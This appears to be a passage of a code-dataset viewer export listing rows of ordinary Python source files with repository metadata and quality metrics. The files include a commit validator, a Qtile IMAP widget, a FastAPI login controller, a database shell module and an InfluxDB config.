rmTry = cc.removeTrace(data)
print(rmTry)
def main():
testSerializer()
testCloudPassageJSONVersion()
testCloudPassagePickledVersion()
if __name__ == '__main__':
main()
| 31
| 87
| 0.7
| 234
| 1,860
| 5.529915
| 0.478632
| 0.009274
| 0.01391
| 0.025502
| 0.341577
| 0.341577
| 0.341577
| 0.341577
| 0.341577
| 0.22102
| 0
| 0.015323
| 0.193011
| 1,860
| 59
| 88
| 31.525424
| 0.846769
| 0.203226
| 0
| 0.292683
| 0
| 0
| 0.088076
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 1
| 0.097561
| false
| 0.195122
| 0.073171
| 0
| 0.170732
| 0.146341
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b9d992fc9c803eca7ba614c187b28cbfcef4b1f8
| 5,988
|
py
|
Python
|
scripts/commit_validation/commit_validation/commit_validation.py
|
cypherdotXd/o3de
|
bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676
|
[
"Apache-2.0",
"MIT"
] | 8
|
2021-08-31T02:14:19.000Z
|
2021-12-28T19:20:59.000Z
|
scripts/commit_validation/commit_validation/commit_validation.py
|
cypherdotXd/o3de
|
bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676
|
[
"Apache-2.0",
"MIT"
] | 8
|
2021-07-12T13:55:00.000Z
|
2021-10-04T14:53:21.000Z
|
scripts/commit_validation/commit_validation/commit_validation.py
|
cypherdotXd/o3de
|
bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-09-16T05:06:18.000Z
|
2021-09-16T05:06:18.000Z
|
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
import abc
import importlib
import os
import pkgutil
import re
import time
from typing import Dict, List, Tuple
VERBOSE = False
class Commit(abc.ABC):
"""An interface for accessing details about a commit"""
@abc.abstractmethod
def get_files(self) -> List[str]:
"""Returns a list of local files added/modified by the commit"""
pass
@abc.abstractmethod
def get_removed_files(self) -> List[str]:
"""Returns a list of local files removed by the commit"""
pass
@abc.abstractmethod
def get_file_diff(self, str) -> str:
"""
Given a file name, returns a string in unified diff format
that represents the changes made to that file for this commit.
Most validators will only pay attention to added lines (with + in front)
"""
pass
@abc.abstractmethod
def get_description(self) -> str:
"""Returns the description of the commit"""
pass
@abc.abstractmethod
def get_author(self) -> str:
"""Returns the author of the commit"""
pass
def validate_commit(commit: Commit, out_errors: List[str] = None, ignore_validators: List[str] = None) -> bool:
"""Validates a commit against all validators
:param commit: The commit to validate
:param out_errors: if not None, will populate with the list of errors given by the validators
:param ignore_validators: Optional list of CommitValidator classes to ignore, by class name
:return: True if there are no validation errors, and False otherwise
"""
failed_count = 0
passed_count = 0
start_time = time.time()
# Find all the validators in the validators package (recursively)
validator_classes = []
validators_dir = os.path.join(os.path.dirname(__file__), 'validators')
for _, module_name, is_package in pkgutil.iter_modules([validators_dir]):
if not is_package:
module = importlib.import_module('commit_validation.validators.' + module_name)
validator = module.get_validator()
if ignore_validators and validator.__name__ in ignore_validators:
print(f"Disabled validation for '{validator.__name__}'")
else:
validator_classes.append(validator)
error_summary = {}
# Process validators
for validator_class in validator_classes:
validator = validator_class()
validator_name = validator.__class__.__name__
error_list = []
passed = validator.run(commit, errors = error_list)
if passed:
passed_count += 1
print(f'{validator.__class__.__name__} PASSED')
else:
failed_count += 1
print(f'{validator.__class__.__name__} FAILED')
error_summary[validator_name] = error_list
end_time = time.time()
if failed_count:
print("VALIDATION FAILURE SUMMARY")
for val_name in error_summary.keys():
errors = error_summary[val_name]
if errors:
for error_message in errors:
first_line = True
for line in error_message.splitlines():
if first_line:
first_line = False
print(f'VALIDATOR_FAILED: {val_name} {line}')
else:
print(f' {line}') # extra detail lines do not need machine parsing
stats_strs = []
if failed_count > 0:
stats_strs.append(f'{failed_count} failed')
if passed_count > 0:
stats_strs.append(f'{passed_count} passed')
stats_str = ', '.join(stats_strs) + f' in {end_time - start_time:.2f}s'
print()
print(stats_str)
return failed_count == 0
def IsFileSkipped(file_name) -> bool:
if os.path.splitext(file_name)[1].lower() not in SOURCE_AND_SCRIPT_FILE_EXTENSIONS:
skipped = True
for pattern in SOURCE_AND_SCRIPT_FILE_PATTERNS:
if pattern.match(file_name):
skipped = False
break
return skipped
return False
class CommitValidator(abc.ABC):
"""A commit validator"""
@abc.abstractmethod
def run(self, commit: Commit, errors: List[str]) -> bool:
"""Validates a commit
:param commit: The commit to validate
:param errors: List of errors generated, append them to this list
:return: True if the commit is valid, and False otherwise
"""
pass
SOURCE_FILE_EXTENSIONS: Tuple[str, ...] = (
'.c', '.cc', '.cpp', '.cxx', '.h', '.hpp', '.hxx', '.inl', '.m', '.mm', '.cs', '.java'
)
"""File extensions for compiled source code"""
SCRIPT_FILE_EXTENSIONS: Tuple[str, ...] = (
'.py', '.lua', '.bat', '.cmd', '.sh', '.js'
)
"""File extensions for interpreted code"""
BUILD_FILE_EXTENSIONS: Tuple[str, ...] = (
'.cmake',
)
"""File extensions for build files"""
SOURCE_AND_SCRIPT_FILE_EXTENSIONS: Tuple[str, ...] = SOURCE_FILE_EXTENSIONS + SCRIPT_FILE_EXTENSIONS + BUILD_FILE_EXTENSIONS
"""File extensions for both compiled and interpreted code"""
BUILD_FILE_PATTERNS: Tuple[re.Pattern, ...] = (
re.compile(r'.*CMakeLists\.txt'),
re.compile(r'.*Jenkinsfile')
)
"""File patterns for build files"""
SOURCE_AND_SCRIPT_FILE_PATTERNS: Tuple[re.Pattern, ...] = BUILD_FILE_PATTERNS
EXCLUDED_VALIDATION_PATTERNS = [
'*/.git/*',
'*/3rdParty/*',
'*/__pycache__/*',
'*/External/*',
'build',
'Cache',
'*/Code/Framework/AzCore/azgnmx/azgnmx/*',
'Code/Tools/CryFXC',
'Code/Tools/HLSLCrossCompiler',
'Code/Tools/HLSLCrossCompilerMETAL',
'Docs',
'python/runtime',
'restricted/*/Tools/*RemoteControl',
'Tools/3dsmax',
'*/user/Cache/*',
'*/user/log/*',
]
| 31.68254
| 124
| 0.631096
| 720
| 5,988
| 5.047222
| 0.3
| 0.04623
| 0.033021
| 0.031646
| 0.168134
| 0.118327
| 0.106219
| 0.042928
| 0.022014
| 0.022014
| 0
| 0.003149
| 0.257515
| 5,988
| 188
| 125
| 31.851064
| 0.814215
| 0.215932
| 0
| 0.125
| 0
| 0
| 0.15374
| 0.056325
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0.108333
| 0.066667
| 0
| 0.175
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a04d1fd425aed6effcc3e48e1eb103f0872ab5a
| 3,621
|
py
|
Python
|
libqtile/widget/imapwidget.py
|
akloster/qtile
|
bd21d0744e177b8ca01ac129081472577d53ed66
|
[
"MIT"
] | 1
|
2021-04-05T07:15:37.000Z
|
2021-04-05T07:15:37.000Z
|
libqtile/widget/imapwidget.py
|
akloster/qtile
|
bd21d0744e177b8ca01ac129081472577d53ed66
|
[
"MIT"
] | 1
|
2022-02-27T12:17:27.000Z
|
2022-02-27T12:17:27.000Z
|
libqtile/widget/imapwidget.py
|
akloster/qtile
|
bd21d0744e177b8ca01ac129081472577d53ed66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015 David R. Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import imaplib
import re
import keyring
from libqtile.log_utils import logger
from libqtile.widget import base
class ImapWidget(base.ThreadPoolText):
"""Email IMAP widget
This widget will scan one of your imap email boxes and report the number of
unseen messages present. I've configured it to only work with imap with
ssl. Your password is obtained from the Gnome Keyring.
Writing your password to the keyring initially is as simple as (changing
out <userid> and <password> for your userid and password):
1) create the file ~/.local/share/python_keyring/keyringrc.cfg with the
following contents::
[backend]
default-keyring=keyring.backends.Gnome.Keyring
keyring-path=/home/<userid>/.local/share/keyring/
2) Execute the following python shell script once::
#!/usr/bin/env python3
import keyring
user = <userid>
password = <password>
keyring.set_password('imapwidget', user, password)
mbox names must include the path to the mbox (except for the default
INBOX). So, for example if your mailroot is ``~/Maildir``, and you want to
look at the mailbox at HomeMail/fred, the mbox setting would be:
``mbox="~/Maildir/HomeMail/fred"``. Note the nested sets of quotes! Labels
can be whatever you choose, of course.
Widget requirements: keyring_.
.. _keyring: https://pypi.org/project/keyring/
"""
defaults = [
('mbox', '"INBOX"', 'mailbox to fetch'),
('label', 'INBOX', 'label for display'),
('user', None, 'email username'),
('server', None, 'email server name'),
]
def __init__(self, **config):
base.ThreadPoolText.__init__(self, "", **config)
self.add_defaults(ImapWidget.defaults)
password = keyring.get_password('imapwidget', self.user)
if password is not None:
self.password = password
else:
logger.critical('Gnome Keyring Error')
def poll(self):
im = imaplib.IMAP4_SSL(self.server, 993)
if self.password == 'Gnome Keyring Error':
self.text = 'Gnome Keyring Error'
else:
im.login(self.user, self.password)
status, response = im.status(self.mbox, '(UNSEEN)')
self.text = response[0].decode()
self.text = self.label + ': ' + re.sub(r'\).*$', '', re.sub(r'^.*N\s', '', self.text))
im.logout()
return self.text
| 38.521277
| 98
| 0.67219
| 485
| 3,621
| 4.985567
| 0.472165
| 0.036394
| 0.021092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004681
| 0.233085
| 3,621
| 93
| 99
| 38.935484
| 0.866042
| 0.631041
| 0
| 0.064516
| 0
| 0
| 0.150741
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0.16129
| 0.16129
| 0
| 0.322581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a186a13afeea2c9ca39fb78982684eb10c871db
| 3,784
|
py
|
Python
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1
|
2021-10-14T07:27:47.000Z
|
2021-10-14T07:27:47.000Z
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 4
|
2019-08-06T02:26:32.000Z
|
2021-06-10T21:39:19.000Z
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1
|
2018-05-11T18:04:41.000Z
|
2018-05-11T18:04:41.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# login.py
# @Author : Gustavo Freitas (gustavo@gmf-tech.com)
# @Link :
# @Date : 12/12/2019, 11:43:07 AM
from typing import Optional, Any
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi import Header, Security
from authentication.models.users import User
from fastapi.security import HTTPBasic, HTTPBasicCredentials, APIKeyHeader
from typing import List
from starlette.responses import Response
from fastapi.encoders import jsonable_encoder
from authentication.interfaces.database import database
import jwt
from starlette.status import HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED
from datetime import datetime, timedelta
from hashlib import sha256
from authentication.interfaces.token import verify_token
router = APIRouter()
security = HTTPBasic(auto_error=True)
api_key = APIKeyHeader(name="x-api-key", auto_error=True)
@router.post("/login", tags=["token"])
async def renew_token(
response: Response,
user: dict = Depends(verify_token),
x_api_key: str = Header(None),
):
response.headers["x-api-key"] = x_api_key
return {"verified": True, "user": user["email"]}
@router.put("/login", tags=["token"])
async def renew_token(response: Response, user: dict = Depends(verify_token)):
sql = """UPDATE users.tbl_users
SET token = :token WHERE
id = :id"""
token = f"{user['pwd_updated_at']}-{user['email']}-{datetime.now()}"
mhash = sha256(token.encode("utf-8"))
token = mhash.hexdigest()
await database.execute(query=sql, values={"id": user["id"], "token": token})
response.headers["x-api-key"] = jwt.encode(
{**user, **dict(exp=(datetime.now() + timedelta(hours=8)))},
token,
algorithm="HS256",
).decode()
return {"renew": True}
# @router.post("/login", dependencies=[Depends(verify_token)])
# async def renew_token(x_api_key: str = Header(None)):
# return {"ok": x_api_key}
@router.get(
"/login", response_model=User, tags=["auth"], response_model_exclude_unset=True
)
async def login_basic(
response: Response, authorization: HTTPBasicCredentials = Security(security)
):
sql = """SELECT tu.id, tu.email, tu."name", tu.linkedin_id , tu.pwd_updated_at
FROM users.tbl_users tu
WHERE tu.passwd is NOT NULL
AND tu.passwd = crypt(:secret,tu.passwd)
AND tu.email = :email
AND tu.enabled = true """
users = await database.fetch_one(
query=sql,
values={"email": authorization.username, "secret": authorization.password},
)
if not users:
raise HTTPException(status_code=HTTP_401_UNAUTHORIZED)
user = jsonable_encoder(users)
sql = """SELECT tp.acl_profile as profile
FROM users.tbl_users tu inner join
users.tbl_profile_users tpu on tpu.id_users = tu.id inner join
users.tbl_profile tp on tp.id = tpu.id_profile
WHERE tu.passwd is NOT NULL
AND tu.passwd = crypt(:secret,tu.passwd)
AND tu.email = :email"""
profiles = await database.fetch_all(
query=sql,
values={"email": authorization.username, "secret": authorization.password},
)
if not profiles:
raise HTTPException(status_code=HTTP_401_UNAUTHORIZED)
user["acl"] = jsonable_encoder(profiles)
sql = """UPDATE users.tbl_users
SET token = :token WHERE
id = :id"""
token = f"{user['pwd_updated_at']}-{authorization.username}-{datetime.now()}"
mhash = sha256(token.encode("utf-8"))
token = mhash.hexdigest()
await database.execute(query=sql, values={"id": user["id"], "token": token})
response.headers["x-api-key"] = jwt.encode(
{**user, **dict(exp=(datetime.now() + timedelta(hours=8)))},
token,
algorithm="HS256",
).decode()
return user
| 29.795276
| 83
| 0.681818
| 496
| 3,784
| 5.08871
| 0.294355
| 0.021395
| 0.022187
| 0.021395
| 0.493265
| 0.443344
| 0.443344
| 0.425515
| 0.385103
| 0.385103
| 0
| 0.014815
| 0.17944
| 3,784
| 126
| 84
| 30.031746
| 0.798068
| 0.075846
| 0
| 0.395349
| 0
| 0
| 0.267355
| 0.055651
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.069767
| 0.162791
| 0
| 0.197674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a1f7efcf406b9bcc9bc35cc271b47eed9db309f
| 7,998
|
py
|
Python
|
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | null | null | null |
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | null | null | null |
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | 1
|
2020-02-05T20:02:15.000Z
|
2020-02-05T20:02:15.000Z
|
import re
import os
import cmd
import sys
import common
from getpass import getpass
from kp import KeePassError, get_password
from configmanager import ConfigManager, ConfigManagerError
common.init()
class ParseArgsException(Exception):
def __init__(self, msg):
self.msg = msg
class ModuleCore(cmd.Cmd):
def __init__(self, module = ''):
cmd.Cmd.__init__(self)
self.master = None
if module == '#':
self.prompt_sign = '#>'
elif module != '':
self.prompt_sign = '[' + module + ']>'
else:
self.prompt_sign = '->'
#defaults
self.ruler = '-'
#Completions
self.directories = []
self.file_server_database = []
self.file_server = []
self.do_cd('.')
configs = ConfigManager().get_config_list()
for conf in configs:
self.file_server_database.append(conf)
self.file_server.append(conf)
for srv in ConfigManager('config/' + conf + '.yaml').get_all():
self.file_server_database.append(conf + '.' + srv)
self.file_server.append(conf + '.' + srv)
for db in ConfigManager('config/' + conf + '.yaml').get(srv)['databases']:
self.file_server_database.append(conf + '.' + srv + '.' + db)
def precmd(self, line):
if not sys.stdin.isatty():
print(line)
return line
def postcmd(self, stop, line):
if not sys.stdin.isatty():
print("")
return stop
def parse_args(self, string="", n=0, m=0):
list = re.findall('"+.*"+|[a-zA-Z0-9!@#$%^&*()_+-,./<>?]+', string)
arg_counter = len(list);
if (arg_counter >= n and arg_counter <= m) or (arg_counter == n and m == 0) or n == 0:
r_list = []
for l in list:
r_list.append(l.replace('"', ''))
return (r_list, len(list))
else:
raise ParseArgsException("Incorrect number of arguments")
# wykonuje daną funkcję (callback) na wszystkich bazach
def exec_on_config(self, callback, args, values, view = ''): # link - file.server.base
if values == '': # wykonaj na wszystkich plikach
files = ConfigManager().get_config_list() # pobierz listę plików konfiguracyjnych
# wyświetl na czym będziesz wykonywać
print("Exec on:")
for file in files:
print('+-',file)
ans = input("Are you sure? [NO/yes/info]: ")
if ans == "yes": #wykonaj callback
for file in files:
if view == 'tree': print('+-', file)
try:
servers = ConfigManager("config/" + file + ".yaml").get_all()
for srv in servers:
if view == 'tree': print("| +-", srv)
databases = servers[srv]["databases"]
for db in databases:
if view == 'tree': print("| | +-", db)
if view == 'list': print('[', file, '->', srv, '->', db, ']')
callback(file, srv, db, *args)
except ConfigManagerError as e:
print(e)
elif ans == "info": #podaj tylko informację na czym callback zostałby wykonany
for file in files:
print('+-', file)
servers = ConfigManager("config/" + file + ".yaml").get_all()
for srv in servers:
print('| +-', srv)
databases = servers[srv]["databases"]
for db in databases:
print('| | +-', db)
else: #jeżeli nie zdecydujemy się na wykonanie czegokolwiek
print("aborted")
else: # jeżeli specjalizujemy na czym chcemy wykonać
val = values.split('.') #rozdzielamy nazwę_pliku.serwera.bazy
params = len(val)
if params == 1: # jeżeli podano nazwę tylko pliku to wykonaj na wszystkich serwerach, bazach które są w nim zapisane
file = val[0]
try:
servers = ConfigManager("config/" + file + ".yaml").get_all()
for srv in servers:
if view == 'tree': print("+-", srv)
databases = servers[srv]["databases"]
for db in databases:
if view == 'tree': print("| +-", db)
if view == 'list': print('[', srv, '->', db, ']')
callback(file, srv, db, *args)
except ConfigManagerError as e:
print(e)
except KeyError as e:
print(e, "is not exist")
elif params == 2: # jeżeli podano nazwę pliku i serwer to wykonaj na wszystkich bazach na serwerze
file = val[0]
try:
servers = ConfigManager("config/" + file + ".yaml").get_all()
srv = val[1]
databases = servers[srv]["databases"]
for db in databases:
if view == 'tree': print("+-", db)
if view == 'list': print('[', db, ']')
callback(file, srv, db, *args)
except ConfigManagerError as e:
print(e)
except KeyError as e:
print(e, "is not exist")
elif params == 3: # podano nazwę pliku, serwer i nazwę bazy - wykonaj polecenie dokładnie na niej
try:
callback(val[0], val[1], val[2], *args)
except ConfigManagerError as e:
print(e)
except KeyError as e:
print(e, "is not exist")
# zwraca skróconą ścieżkę do aktualnego katalogu - funkcja pomocnicza
def get_shortpath(self):
path = common.get_cdir()
separator = ''
if '\\' in path:
separator = '\\'
else:
separator = '/'
start = path.find(separator)
end = path.rfind(separator, 0, len(path)-1)
if start < end:
return (path[0:start+1] + '...' + path[end:])
else:
return (path)
# autouzupełnienia dla cmd polecenia cd
def complete_cd(self, text, line, begidx, endidx):
if not text:
completions = self.directories[:]
else:
completions = [f for f in self.directories if f.startswith(text)]
return completions
# polecenie cd - pozwala na przemieszczanie się po katalogach
def do_cd(self, args):
"Move to directory"
if args == '':
print(common.get_cdir())
else:
try:
common.chdir(args)
self.prompt = self.get_shortpath() + ' ' + self.prompt_sign
self.directories = []
for name in os.listdir(common.get_cdir()):
if os.path.isdir(os.path.join(common.get_cdir(), name)):
self.directories.append(name)
except FileNotFoundError as e:
print(e)
# wyświetla wszystkie pliki w lokalizacji
def do_ls(self, args):
"List directory"
for name in os.listdir(common.get_cdir()):
print(name)
# podaje pełną ścieżkę aktualnego katalogu
def do_pwd(self, args):
"Print path"
print(common.get_cdir())
# pozwala na decyzję czy chcemy wyświetlać warningi
def do_warn(self, args):
"""warn <on/off>"""
try:
(values, values_num) = self.parse_args(args, 0, 1)
if values_num == 1:
if values[0] == 'on':
print('Warnings on')
self.warn = True
elif values[0] == 'off':
print('Warnings off')
self.warn = False
else:
print('Incorrect argument.')
else:
if self.warn == True:
print('Status: on')
else:
print('Status: off')
except ParseArgsException as e:
print(e)
# ustawia masterpassword dla keepasa
def do_setMaster(self,args):
"Set master password"
if sys.stdin.isatty(): # jezeli jako shell
p = getpass('Enter Master Password: ')
else:
p = sys.stdin.readline().rstrip()
self.master = p
def do_exit(self, *args):
return True
def do_EOF(self, line):
return True
def emptyline(self):
return False
# Musimy wyłapać wszystko co możliwe, nie ma pliku, zly master itp. i zwrocic 1 wyjątek
def get_password(self, alias):
keepass_path = common.keepass_path
if self.master == None:
raise KeePassError("Master Password Not Set")
try:
return get_password(keepass_path, self.master, alias)
except KeePassError as e:
raise e
def connect_command_builder(self,connection, perm):
try:
command = connection["adress"] + "_" + connection["user"]+ "_" + \
self.get_password(connection["keepass"]) + "_" + str(connection["sshport"]) + "_" + str(connection["remoteport"]) + "_" + perm
except (KeyError, KeePassError) as e1:
try:
command = connection["adress"] + "_" + connection["user"]+ "_" + \
connection["passwd"] + "_" + str(connection["sshport"]) + "_" + str(connection["remoteport"]) + "_" + perm
return command
except KeyError as e2:
if isinstance(e1,KeePassError):
raise KeePassError("Unable to use Keepass(" + e1.value + ") or Password")
else:
raise KeePassError("Invalid connection in yaml file")
raise KeePassError(e1)
return command
| 29.512915
| 132
| 0.635159
| 1,039
| 7,998
| 4.805582
| 0.256015
| 0.006008
| 0.01442
| 0.016223
| 0.286
| 0.276387
| 0.231925
| 0.187863
| 0.175446
| 0.175446
| 0
| 0.0048
| 0.218555
| 7,998
| 271
| 133
| 29.512915
| 0.79408
| 0.147162
| 0
| 0.348416
| 0
| 0
| 0.102377
| 0.005542
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081448
| false
| 0.072398
| 0.036199
| 0.013575
| 0.180995
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
e0201884251a727105b3a8b3946ca3bc3aefd73d
| 480
|
py
|
Python
|
devito/passes/iet/languages/C.py
|
guaacoelho/devito
|
7e0b873114675752c4a49ed9076ee5d52997833c
|
[
"MIT"
] | 199
|
2016-08-18T23:33:05.000Z
|
2019-12-24T07:08:48.000Z
|
devito/passes/iet/languages/C.py
|
guaacoelho/devito
|
7e0b873114675752c4a49ed9076ee5d52997833c
|
[
"MIT"
] | 949
|
2016-04-25T11:41:34.000Z
|
2019-12-27T10:43:40.000Z
|
devito/passes/iet/languages/C.py
|
guaacoelho/devito
|
7e0b873114675752c4a49ed9076ee5d52997833c
|
[
"MIT"
] | 78
|
2016-08-30T07:42:34.000Z
|
2019-12-13T20:34:45.000Z
|
from devito.ir import Call
from devito.passes.iet.definitions import DataManager
from devito.passes.iet.langbase import LangBB
__all__ = ['CBB', 'CDataManager']
class CBB(LangBB):
mapper = {
'aligned': lambda i:
'__attribute__((aligned(%d)))' % i,
'host-alloc': lambda i, j, k:
Call('posix_memalign', (i, j, k)),
'host-free': lambda i:
Call('free', (i,)),
}
class CDataManager(DataManager):
lang = CBB
| 21.818182
| 53
| 0.591667
| 57
| 480
| 4.824561
| 0.508772
| 0.109091
| 0.116364
| 0.138182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.260417
| 480
| 21
| 54
| 22.857143
| 0.774648
| 0
| 0
| 0
| 0
| 0
| 0.18125
| 0.058333
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.133333
| 0.2
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
e0404632a7378b088279de3e94aac11c26a9e183
| 1,540
|
py
|
Python
|
monasca_persister/conf/influxdb.py
|
zhangjianweibj/monasca-persister
|
0c5d8a7c5553001f2d38227347f482201f92c8e1
|
[
"Apache-2.0"
] | null | null | null |
monasca_persister/conf/influxdb.py
|
zhangjianweibj/monasca-persister
|
0c5d8a7c5553001f2d38227347f482201f92c8e1
|
[
"Apache-2.0"
] | 1
|
2020-03-13T12:30:29.000Z
|
2020-03-13T12:38:16.000Z
|
monasca_persister/conf/influxdb.py
|
zhangjianweibj/monasca-persister
|
0c5d8a7c5553001f2d38227347f482201f92c8e1
|
[
"Apache-2.0"
] | null | null | null |
# (C) Copyright 2016-2017 Hewlett Packard Enterprise Development LP
# Copyright 2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
influxdb_opts = [
cfg.StrOpt('database_name',
help='database name where metrics are stored',
default='mon'),
cfg.HostAddressOpt('ip_address',
help='Valid IP address or hostname '
'to InfluxDB instance'),
cfg.PortOpt('port',
help='port to influxdb',
default=8086),
cfg.StrOpt('user',
help='influxdb user ',
default='mon_persister'),
cfg.StrOpt('password',
secret=True,
help='influxdb password')]
influxdb_group = cfg.OptGroup(name='influxdb',
title='influxdb')
def register_opts(conf):
conf.register_group(influxdb_group)
conf.register_opts(influxdb_opts, influxdb_group)
def list_opts():
return influxdb_group, influxdb_opts
| 32.765957
| 69
| 0.653896
| 190
| 1,540
| 5.221053
| 0.573684
| 0.060484
| 0.02621
| 0.032258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017544
| 0.25974
| 1,540
| 46
| 70
| 33.478261
| 0.852632
| 0.398701
| 0
| 0
| 0
| 0
| 0.225275
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0.083333
| 0.041667
| 0.041667
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.